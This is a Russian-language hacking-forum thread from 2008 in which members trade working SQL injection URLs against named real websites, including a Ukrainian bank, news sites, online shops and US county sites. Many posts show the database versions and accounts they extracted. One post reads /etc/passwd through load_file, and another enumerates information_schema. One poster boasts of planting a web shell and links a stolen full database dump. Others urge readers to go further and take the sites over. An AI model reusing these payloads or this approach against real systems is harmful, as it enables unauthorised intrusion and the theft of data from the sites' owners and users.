Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.06.2008, 05:39
|
|
Познающий
Регистрация: 07.04.2007
Сообщений: 88
Провел на форуме:
6406543
Репутация:
48
|
|
Бага
http://tid.odessa.ua/news/?newsid=-513+union+select+1,2,3,4,5/*
Глянем имя БД
http://tid.odessa.ua/news/?newsid=-513+union+select+concat_ws(0x3a3a,version(),user() ,database()),2,3,4,5/*
Облом... а если так??? 
http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
4.1.11-Debian_4sarge8-log::newtid@localhost::newtid
Бага
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,4,5
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5
5.0.45-Debian_1ubuntu3.3-log::rus1@10.0.0.46::news_music
Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.
Последний раз редактировалось furang; 24.06.2008 в 05:52..
|
|
|
24.06.2008, 06:14
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от furang
http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
намного удобнее если использовать конструкцию например так:
http://tid.odessa.ua/news/?newsid=-513+union+select+unhex(hex(concat_ws (0x3a3a,version(),user(),database()))),2 ,3,4,5/*
Последний раз редактировалось gisTy; 24.06.2008 в 09:23..
|
|
|
|
24.06.2008, 08:22
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 19
Провел на форуме:
95226
Репутация:
10
|
|
Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
|
|
|
|
24.06.2008, 08:47
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Сообщение от #urbaner
Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
Прости, но я там на зареген. Нашел скуль сам, если не веришь, почитай предыдущие мои посты по скулям, или ты думаешь что я настолько тупой и их тоже скопипастил?
Этот сайт одна сплошная дырень, помимо моего шелла, там было еще 2, если быть точнее, то я раскрутил скуль 17/06/2008, а выложил только щас.
Так что сам делай выводы.
ЗЫ И уж кому, так точно не тебе меня учить, на себя лучше посмотри.
ЗЗЫ Вот ты и спалился, я ждал когда ты появишся, тебе привет от 26, я думаю ты сразу поймешь о ком я, чето вы долго сайт свой поднимали...
Если бы не 26 тогда тебе сказал про дыру, хер бы ты написал ту статью, я почему-то свой код запроса там узнаю. Я делал, отталкиваясь от этой статьи: https://forum.antichat.ru/thread43966.html, а вот тебе инфу слили...
xxx (18:17:43 17/06/2008)
data.php - твоё?
xxx (18:17:45 17/06/2008)
в папке
Лайт (18:18:01 17/06/2008)
нет
xxx (18:18:38 17/06/2008)
ипать
xxx (18:18:42 17/06/2008)
уже до нас кто-то залил
xxx (18:18:48 17/06/2008)
http://www.alfavideo.ru/img/data.php
Лайт (18:18:49 17/06/2008)
шелл?
xxx (18:18:51 17/06/2008)
гыыы
xxx (18:18:53 17/06/2008)
да
Лайт (18:18:58 17/06/2008)
ахахахаха
Лайт (18:19:00 17/06/2008)
ГЫЫЫЫ
xxx (18:19:05 17/06/2008)
ну судя по версии шелла, это был новичёк
PS А вот и дамп ВСЕЙ базы, качайте на здоровье! http://ifolder.ru/7090064
Дату создания файла только гляньте...
Ты не на того наехал олень.
Последний раз редактировалось Лайт; 24.06.2008 в 10:00..
|
|
|
|
24.06.2008, 13:15
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038
Репутация:
11
|
|
http://easynotebook.890m.com/notelist.php?exid=2785J&n=15)%20UNION%20SELECT%201 ,database(),3,4,5,version(),7/*
4.1.22-standard
(хотя ничего полезного там нету к сожалению)
слепая:
http://procreditbank.com.ua/?cat=130&num=220&news=3467%20AND%201=2
MYSQL 4.0.27-standard
база mfb
юзер mfb@rex.kiev.sovam.com
|
|
|
|
24.06.2008, 17:40
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
понаходил скули...
http://www.elson.ru/cgi-bin/dsp.pl?mode=add_to_basket&goods_id=999999+union+se lect+1/*
http://www.hitech-online.ru/boards/pc/weblinks.html?start=9999+union+select+1/*
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default
http://www.knife.ru/index.php?1=1&do=list&treeid=9999999+union+select+ 1/*
http://www.abcinfo.ru/index.php?l=99999+union+select+1/*
http://salonkrasotka.ru/catalog2.php?customerid=9999999+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2/*
http://www.child-toys.ru/view_catalog.php?mtypeid=-1+union+select+1,version(),3,4,5/*
http://www.l-gifts.ru/view_catalog.php?type_low=-1+union+select+version(),2/*
http://www.ab-tuning.ru/view_catalog.php?code=1'
http://www.ceramicgroup.ru/view_catalog.php?razdel=-1
http://www.whitegoods.ru/selection/?cID=175&min_price=%D0%BE%D1%82&max_price=%D0%B4%D 0%BE&boxes[aad]=310&boxes[absolut]=99999)+union+select+1,2,3,4,5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
некоторые непохек..) разкручивайте кто может.. и сюда..)
_____________________________________________
где же моя подпись?
Последний раз редактировалось sabe; 24.06.2008 в 17:44..
|
|
|
|
24.06.2008, 22:07
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Продолжим тему авиа**** и лоад_филе:
Код:
http://www.aviaport.ru/directory/publishers/?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,load_file(0x2f6574632f706173737764),27,28,29,30/*
Версион, юзер, датабэйс через cast(version()/**/AS/**/binary)
Последний раз редактировалось Ch3ck; 24.06.2008 в 22:15..
|
|
|
|
25.06.2008, 10:59
|
|
Новичок
Регистрация: 14.08.2007
Сообщений: 1
Провел на форуме:
14484
Репутация:
-1
|
|
http://www.rotawheels.com/news.php?id=-3+union+select+1,user(),version(),database(),5/*
4.1.20-log 339068_rota@172.16.10.83 339068_rotanews
http://www.phpbuddy.com/article.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5,6
4.1.21-standard  hpbud22_phpbudd@localhost hpbud22_phpbu ddy
Последний раз редактировалось Laipone; 25.06.2008 в 19:00..
|
|
|
|
25.06.2008, 15:18
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Крупный игровой портал : apollo.lv
http://cs.apollo.lv/stats/weapon.php?id=20+limit+0+union+select+1,TABLE_NAME ,3,4,5,6,7,8,9,10,11,12,13,TABLE_SCHEMA,15,16,17,1 8,19+from+information_schema.columns/*
Последний раз редактировалось DJ ][akep; 25.06.2008 в 15:22..
|
|
|
|
25.06.2008, 22:01
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
PR 5
http://www.nashuapride.com/events/event_info.php?eventid=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9/*
4.1.20::pride06@localhost::pride
PR 4
http://www.thegenesisgroup.org/calendar/event_info.php?eventid=-16+union+select+1,2,unhex(hex(concat_ws(0x3a3a,ver sion(),user(),database()))),4,null,6,7/*
4.1.12::root@localhost::genesis_grou
рутовая запись.. finish him!!!
PR 4
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a3a,versi on(),user(),database()),null,7,8/*
5.0.22-community-nt::root@psn.flaglercounty.org::flaglercounty_org
рутовая запись... Finish him!!!
PR 4
http://www.moeck.com/pages.php?pid=-800+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),null,5,6,7/*
4.0.27-max-log::dbo145510923@212.227.127.166::db145510923
file_priv нету
PR 3
http://www.esateys.com/pages.php?pID=-80+union+select+1,2,3,4,5,concat(version(),0x3a3a, user(),0x3a3a,database()),7,8,9,10/*
4.1.22-max-log::eCart@linhostssl06.prod.mesa1.secureserver.ne t::eCart
file_priv нет
PR 3
http://fmccrustel.ru/pages.php?pid=-18+union+select+1,concat(version(),0x3a3a,user(),0 x3a3a,database()),3,4/*
5.0.45-log::fmccel@localhost::fmccel
file_priv нет, в базе ничего интересного нету
PR 2
http://www.psplaw.co.uk/preview/pages.php?pid=-2+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3/*
4.1.22-standard::powellsp_user@localhost::powellsp_data
file_priv нету
Последний раз редактировалось gisTy; 26.06.2008 в 06:45..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.gif){kind=avatar}
Похожие темы
Линейный вид
